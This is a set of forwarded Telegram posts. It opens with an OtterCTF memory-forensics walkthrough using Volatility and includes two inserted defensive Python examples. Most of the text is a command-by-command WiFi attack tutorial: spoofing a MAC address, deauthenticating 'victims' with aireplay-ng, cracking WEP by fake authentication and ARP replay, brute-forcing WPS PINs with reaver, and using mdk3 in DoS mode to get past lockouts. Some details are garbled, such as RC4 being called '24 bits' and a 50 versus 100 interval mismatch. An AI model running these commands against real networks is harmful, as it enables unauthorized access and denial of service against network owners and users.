Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Ok, hold your beers 🍻 guys,
If you are following OtterCTF, no worries.
If not, I will begin with the question too.
1. In the above given dump file (otterctf.vmem)
The user used to play an online game, and you need to find the game name and its server IP address.
How will you do it? Think.
Answer:-
Do netscan using Volatility.
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
3. There's a malware in the dump file; now you need to track the malware.
Let's begin.
Normally hackers make the malware run in the background, so let's check if there are any hidden processes using the psxview plugin.
In most cases, both pslist and psscan will show False for malware, but here it's some special case 😑
Forwarded from Team ETF (Groot)
4. So let's use the pstree plugin, which will show the running processes in tree format.
And here we can see 2 suspicious processes (guessing that they might be malware):
Vmware-tray
Rick and Morty
Because the PID of Rick and Morty matches the PPID of vmware-tray.
PID - process ID
PPID - parent PID
Vmware-tray is a common process in VMware. The name doesn't look suspicious.
Let's check where the file exists.
Forwarded from Team ETF (Groot)
5. Let's use the filescan module to check where that actual file exists.
Now we can see that the file isn't in the VMware directory at all. It's in the most common malware directory, "tmp".
Now it's sure that it is a virus.
To make 100% sure, dump that file to your device and scan it in VirusTotal. (Use the dumpmem plugin or any suitable one to dump it.)
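The three checks in posts 3 to 5 (psxview for unlinked processes, pstree for the parent/child relation, filescan for the image path) reduce to a small amount of logic. The script below is an added example, not code from the Team ETF posts and not Volatility's own API: it runs the same triage over constructed process and file records so the reasoning can be followed offline. The names mirror the write-up (vmware-tray, Rick And Morty), but every PID, path and the `hidden.exe` entry are made up for the example.

```python
"""Added example (not from the Team ETF posts, not Volatility code): the
psxview -> pstree -> filescan triage described above, run over constructed
sample records instead of a memory image."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    in_pslist: bool   # seen by walking the EPROCESS linked list (pslist)
    in_psscan: bool   # seen by pool-tag scanning (psscan)


@dataclass(frozen=True)
class FileHit:
    path: str         # path as a filescan-style listing would report it
    name: str         # image name the process runs as


# Constructed sample data: PIDs, the hidden.exe entry and both paths are made up.
PROCS = [
    Proc(4,    0,    "System",             True,  True),
    Proc(628,  4,    "smss.exe",           True,  True),
    Proc(1148, 1076, "explorer.exe",       True,  True),
    Proc(3820, 1148, "Rick And Morty.exe", True,  True),
    Proc(3720, 3820, "vmware-tray.exe",    True,  True),
    Proc(2992, 1148, "hidden.exe",         False, True),   # unlinked from pslist
]

FILES = [
    FileHit(r"\Program Files\VMware\VMware Tools\vmware-tray.exe", "vmware-tray.exe"),
    FileHit(r"\Users\Rick\AppData\Local\Temp\vmware-tray.exe", "vmware-tray.exe"),
]

# Directories where a legitimately installed binary is expected to live,
# and markers for the temp locations the post calls out.
TRUSTED_DIRS = ("\\windows\\", "\\program files\\")
TEMP_MARKERS = ("\\temp\\", "\\tmp\\")


def hidden_processes(procs):
    """psxview-style check: present to the pool scan but missing from pslist."""
    return [p for p in procs if p.in_psscan and not p.in_pslist]


def children_of(procs, parent_name):
    """pstree-style check: (parent, child) pairs where child.ppid == parent.pid."""
    parents = [p for p in procs if p.name.lower() == parent_name.lower()]
    return [(parent.name, child.name)
            for parent in parents
            for child in procs
            if child.ppid == parent.pid]


def suspicious_paths(files):
    """filescan-style check: image sits in a temp dir rather than an install dir."""
    flagged = []
    for f in files:
        low = f.path.lower()
        in_temp = any(m in low for m in TEMP_MARKERS)
        in_trusted = any(d in low for d in TRUSTED_DIRS)
        if in_temp and not in_trusted:
            flagged.append(f.path)
    return flagged


def triage(procs, files):
    """Combine the three checks into one list of findings."""
    findings = []
    for p in hidden_processes(procs):
        findings.append(f"hidden from pslist: {p.name} (pid {p.pid})")
    for parent, child in children_of(procs, "Rick And Morty.exe"):
        findings.append(f"unexpected parent: {parent} -> {child}")
    for path in suspicious_paths(files):
        findings.append(f"image in temp dir: {path}")
    return findings


if __name__ == "__main__":
    for line in triage(PROCS, FILES):
        print(line)
```

The same path logic is what makes the post's conclusion sound: a process named like a VMware component is only trustworthy when its backing file is under the VMware install directory, so the path check carries more weight than the process name.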
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Shall I make this channel private?
All contents posted here are unique from any other channels on Telegram.
Anonymous Quiz
67%
Yes
33%
No
Forwarded from Team ETF (ᴵ ᵃᵐ ᵍʳᵒᵒᵗ)
Have a look at our "Team ETF" Channel reviews,
@Team_Etf_reviews
For any queries / doubts contact
@Etf_Zan_bot ( fast reply )
@Zincster ( slow 😐 )
Forwarded from Zincster
Part-01 :-
Wifi cracking :-
Requirements:-
1. Wifi adapter supporting monitor mode (monitor mode is used to capture packets. Well, a normal wifi adapter will be in managed mode, in which we usually connect to other devices.)
2. Any OS (but I recommend Kali Linux)
Demonstration:-
To be safe, change your adapter's MAC address:
🧬ifconfig wlan0 down
🧬ifconfig wlan0 hw ether 11:22:33:44:55:66
🧬ifconfig wlan0 up
This method is the same for changing the MAC address of any interface (like wlan0, eth0, etc.).
If you want to change the MAC address of eth0, just replace wlan0 with eth0.
Here, first we stopped the interface.
hw -> hardware
And we gave the desired MAC address (you can give any 12 digits in the same format).
And in the next step we started the interface.
Monitor mode:-
As I told earlier, every adapter will be in managed mode, so you need to change that mode to monitor mode.
To do this we use airmon-ng:
🧬airmon-ng check kill
🧬airmon-ng start wlan0
Now if you do ifconfig, the wlan0 interface will have been changed to mon0 or wlan0mon or some other name.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-02 :-
Deauthentication :-
We use this trick to disconnect any user from the network.
First run
🧬airodump-ng wlan0mon
Now you can see the router's MAC (BSSID) and its channel.
Now, to get all users on that wifi, run
🧬airodump-ng --channel [_] --bssid [_] wlan0mon
Now you can see all the users on that wifi.
Now use aireplay-ng to disconnect them:
🧬aireplay-ng --deauth 555555 -a [_] -c [_] wlan0mon
Here,
555555 is the number of packets we are sending to the particular victim to disconnect them from the router.
-a is the router's BSSID.
-c is the victim's MAC, which we got by running airodump-ng.
In case you want to disconnect all clients from the router, then
🧬aireplay-ng --deauth 55555555 -a [_] wlan0mon
This will disconnect all the clients.
But the effect will be less, meaning it may take some time to disconnect every client.
Written by :- I am groot [ @Etf_Zan ]
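From the network owner's side, the flood described in Part-02 is easy to spot: a real access point sends a handful of deauthentication frames per client, while the aireplay-ng pattern above is hundreds per second aimed at one station or at the broadcast address. The detector below is an added example, not from the post and not part of the aircrack-ng suite. It assumes the 802.11 management frames have already been decoded into simple records (a capture parser such as Scapy's Dot11 layers would do that step; it is not included here), and the capture it runs on is constructed inline.

```python
"""Added example (not from the post, not aircrack-ng code): a defender-side
detector for deauthentication / disassociation floods, using a sliding
time window per (BSSID, destination) pair. Input frames are constructed."""
from collections import defaultdict, deque
from dataclasses import dataclass

DEAUTH = 12     # 802.11 management frame subtype 12 = Deauthentication
DISASSOC = 10   # subtype 10 = Disassociation, abused the same way
BEACON = 8      # subtype 8 = Beacon, normal background traffic
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class MgmtFrame:
    ts: float      # capture timestamp in seconds
    subtype: int
    bssid: str     # address 3 in a management frame
    dst: str       # address 1: the station being told to leave


def deauth_flood_alerts(frames, window_s=1.0, threshold=20):
    """Return one alert per (bssid, dst) pair whose deauth/disassoc count
    exceeds `threshold` within any sliding window of `window_s` seconds.
    Frames of other subtypes are ignored; frames may arrive unsorted."""
    recent = defaultdict(deque)   # (bssid, dst) -> timestamps inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in (DEAUTH, DISASSOC):
            continue
        key = (f.bssid, f.dst)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # drop timestamps that fell out
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            scope = "all clients (broadcast)" if f.dst == BROADCAST else f.dst
            alerts.append(f"deauth flood from {f.bssid} -> {scope}: "
                          f"{len(q)} frames in {window_s}s at t={f.ts:.2f}")
    return alerts


def sample_capture():
    """Constructed capture: benign background plus one targeted flood.
    The AP and client MAC addresses are made up for this example."""
    ap, victim = "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66"
    frames = [MgmtFrame(0.0, BEACON, ap, BROADCAST)]        # ignored
    frames.append(MgmtFrame(0.5, DEAUTH, ap, victim))       # one legitimate deauth
    # 30 deauths within 0.3 s to one client: the `--deauth ... -c` pattern
    frames += [MgmtFrame(10.0 + i * 0.01, DEAUTH, ap, victim) for i in range(30)]
    # 5 broadcast deauths spread over 10 s: stays under threshold, no alert
    frames += [MgmtFrame(20.0 + i * 2.0, DEAUTH, ap, BROADCAST) for i in range(5)]
    return frames


if __name__ == "__main__":
    for alert in deauth_flood_alerts(sample_capture()):
        print(alert)
```

Detection only tells you it is happening; the mitigation that actually stops unauthenticated deauthentication frames from working is 802.11w (Protected Management Frames), which makes the client discard deauth frames not integrity-protected with the session key.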
Forwarded from Zincster
Part-03:-
WEP cracking :-
🧬airodump-ng wlan0mon
As we already know, we now get all the routers available.
🧬airodump-ng --bssid [_] --channel [_] --write trial wlan0mon
All the steps are the same as I told earlier; one change here is that we are writing the captured packets to the trial file.
🧬aireplay-ng --fakeauth 0 -a [_] -h [_] wlan0mon
Here,
We are doing fake authentication.
0 means authenticate only once.
-a -> victim's BSSID
-h -> your BSSID
🧬aireplay-ng --arpreplay -b [_] -h [_] wlan0mon
After successfully authenticating with the target, we will wait to get an ARP packet, and we will inject that packet into the traffic.
You can see we didn't specify any number after --arpreplay as we did earlier in --fakeauth. This is because we want the process to repeat continuously till we get enough IVs.
-b -> victim's BSSID
-h -> your BSSID
IV -> random initialization vector used to generate key streams
I forgot to tell you earlier that WEP uses the RC4 algorithm (24 bits) to encrypt the flow of data.
IV + key(password) = key_stream
Now key_stream will be added to the data to make it unreadable.
Now, we have the captured file (cap file) which we got in the first step (trial).
The file would be created as trial-01.cap.
Now, crack it.
🧬aircrack-ng trial-01.cap
That's it, you will get the key after it has been cracked.
Remember, the fake authentication method is used for WEP only.
Written by :- I am groot [ @Etf_Zan ]
Forwarded from Zincster
Part-04 :-
WPA / WPA2 cracking
( WPS enabled )
WPA -> TKIP encryption
WPA2 -> CCMP encryption
Remember the encryption used in WEP -> RC4 algorithm
To see all the WPS-enabled routers, we use the wash tool:
🧬wash -i wlan0mon
-i -> interface
🧬aireplay-ng --fakeauth 100 -a [_] -h [_] wlan0mon
-a -> victim's MAC
-h -> your MAC
You may get a doubt about why we have used 50 here; that's because we need to associate with the target network every 50 seconds.
Now, to brute-force we use a tool called reaver:
🧬reaver --bssid [_] --channel [_] -i wlan0mon -A -N -vvv
-A -> we are telling it not to associate with the target.
-N -> we are telling it to send no NACKs while authenticating.
-vvv -> it's called the verbose level.
If you have used nmap you will be well aware of this.
If some routers block you,
meaning like on some website logins, if you enter wrong passwords it will block you.
So for this, we will use a tool called mdk3 which will use a different MAC address while connecting. (Like we use different VPNs to change our IP.)
🧬mdk3 wlan0mon a -a [_]
a -> it is a test mode, which is the DoS mode here
-a -> victim's MAC
That's it.....
Written by :- I am groot [ @Etf_Zan ]